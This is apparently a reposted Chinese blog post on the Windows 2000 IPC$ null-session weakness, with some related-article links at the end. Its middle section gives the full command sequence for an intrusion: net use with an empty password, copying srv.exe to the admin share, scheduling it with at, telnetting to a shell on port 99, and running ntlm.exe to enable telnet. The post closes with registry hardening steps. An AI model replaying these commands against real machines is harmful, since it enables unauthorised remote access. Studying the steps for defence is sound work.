拒绝背后黑手的窥探IPC$漏洞大揭秘
什么是IPC漏洞
IPC是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们还可以得到目标主机上的用户列表。但是,一些别有用心者会利用IPC,查找我们的用户列表,并使用一些字典工具,对我们的主机进行攻击。
如何利用IPC漏洞
攻击者在这里一般会用到《流光》这个软件,兔子在这里特别提醒你,《流光》是一款功能非常强大的软件,在我们使用时一定要注意,不得进行非法破坏!
第一步:运行《流光》(现在的最新版本是4.6),按“CTRL+R”键弹出扫描框,我们这里只是做个测试,目的是告诉大家这个漏洞的危害,所以我们现在随便选择一段IP进行扫描。我们扫描的是127.0.0.1(如图),其它的均使用默认,不需要改变设置。
第二步:大家打开Win2000自带的命令提示行,注:这里我们不是教大家怎么破坏,只是给大家介绍这个漏洞的危害,所以下面的IP是假设的,并不存在。
1. C:\>net use \\127.0.0.1\IPC "" /user:"admintitrators"
这就是刚才用《流光》扫到的用户名是administrators,密码为“空”的IP地址,如果是攻击者的话,他就会用这样的命令来与127.0.0.1建立一个连接,因为密码为“空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin
先复制srv.exe上去,在流光的Tools目录下就有(这里的是指admin用户的c:\winnt\system32\,大家还可以使用c、d,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1的当前时间是2002/3/19上午11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了。
7.C:\>copy ntlm.exe \\127.0.0.1\admin
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务!
第三步:我们使用Telnet到对方计算机上去,Telnet 127.0.0.1,接着输入用户名与密码就进入了,操作就像在DOS上操作一样简单!
如何防范IPC漏洞
看了上面的方法是不是觉得该检测一下自己是否有这个漏洞,如果有,还不赶快把这个漏洞给补上?跟我来吧,下面我们将教你如何防范IPC漏洞的入侵
1.禁止建立空连接
我们首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001。
2.禁止管理共享
同样也是找到如下组键[HKEY_LOCAL _MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer = DWORD的键值改为:00000000。
3.到[url]http://www.heibai.net/download/show.php?id=2194&down=1[/url]下载delshare.zip。该工具能自动永久删除Windows 2000所有默认共享的两个批处理文件。
4.如果还觉得麻烦的话,也可以把“net share ipc /delete”放进你的启动栏里。
5.当然,最简单的方法就是把的密码设置得复杂一些,以免被一些不怀好意的人使用工具破解出来。不过想提醒大家一点,任何复杂的密码都有可能被破解。
本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8406 ,如需转载请自行联系原作者
拒绝背后黑手的窥探IPC$漏洞大揭秘相关推荐
- FireEye 红队失窃工具大揭秘之:分析复现 Zoho 任意文件上传漏洞(CVE-2020-8394)
聚焦源代码安全,网罗国内外最新资讯! 前言 最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗.虽然目前尚不清楚这些红队工具将被如 ...
- 免费下载 | 超级APP背后的移动端技术大揭秘
隔空手势操作.互动视频技术.人脸识别的弹幕跟随......优酷移动端的一路优化革新,无论是从用户体验还是技术上,都是名副其实的"超级APP".本章从 基础架构.组件化解决方案.播放 ...
- 【网络安全入门大总结】—Java语言中常用的渗透漏洞大汇总
Java语言中常用的漏洞大汇总,建议收藏. 准备好,上课了~~~ 目录 Servlet 简介 生命周期为 接口 Struts 2 . 简介 请求流程 相关CVE Spring 简介 Spring MV ...
- FireEye 红队失窃工具大揭秘之:分析复现 Confluence路径穿越漏洞 (CVE-2019-3398)
聚焦源代码安全,网罗国内外最新资讯! 前言 最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗.虽然目前尚不清楚这些红队工具将被如 ...
- 大揭秘(4):网店背后的隐秘产业链【连载】
<大揭秘!网店背后的隐秘产业链>是由电子商务资深人士"周玉柱"策划撰写的励志书籍<电子商务-席卷全球>丛书之一,这本书将揭露网店背后的阴谋操盘方法.这里只转 ...
- 大揭秘(2):网店背后的隐秘产业链【连载】
<大揭秘!网店背后的隐秘产业链>是由电子商务资深人士策划撰写的励志书籍,这本书将寻求出版社进行出版.这里只转载其中的一个章节,其他章节请大家去百度上面搜索. [第二章]小网店主应站在巨 ...
- 谷歌钦定的编程语言Kotlin大揭秘
第一时间关注程序猿(媛)身边的故事 谷歌钦定的编程语言Kotlin大揭秘 语法+高级特性+实现原理:移动开发者升职加薪宝典! 谷歌作为世界级的科技公司巨头,强悍的技术研发与创新能力使其一直是业界的楷模 ...
- 黑客爱用的 HOOK 技术大揭秘!
黑客爱用的 HOOK 技术大揭秘! 什么是 HOOK 技术? 病毒木马为何惨遭杀软拦截? 商业软件为何频遭免费破解? 系统漏洞为何能被补丁修复? 这一切的背后到底是人性的扭曲,还是道德的沦丧,敬请收看 ...
- 360黑匣子之谜——奇虎360“癌”性基因大揭秘
360黑匣子之谜--奇虎360"癌"性基因大揭秘 http://www.nbd.com.cn 2013-02-26 01:33 核心提示: 360怎么了?这是一家什么样的企业?带着 ...
最新文章
- mail 发送email
- php python插件安装,小弟我的vim配置和插件 小型 python php IDE
- 无法嵌入互操作类型 请改用适用的接口_机器视觉可用的不同电缆和连接器类型以及相关利弊分析...
- 公司网站Silverlight版^_^
- webrender 查看是否开启_想要体验极致顺滑的网页加载体验?手动开启Firefox WebRender渲染引擎...
- MySQL考试复习(知识点、练习题)
- Android检测网络是否正常代码!
- PHPCrawl webcrawler library/framework
- SSL 1203 书的复制
- java 倍数_Java硬币翻转倍数递增试算实例
- Mini-CEX在神经内科住院医师临床能力培养中的应用
- Idea的快捷功能使用统计
- Kotlin拿Android本地视频缩略图
- 如何有效的记忆和提取记忆
- 第五章 习惯三 要事第一——自我管理原则
- 数学符号大全 打不出就复制吧
- [Unity官方文档翻译]Downloading and Installing Unity下载和安装unity教程
- VS2008安装盘整合sp1补丁
- RGB565转RGB888
- CQUPT 2023毕业论文中的Mathtype公式编号及其图表的题注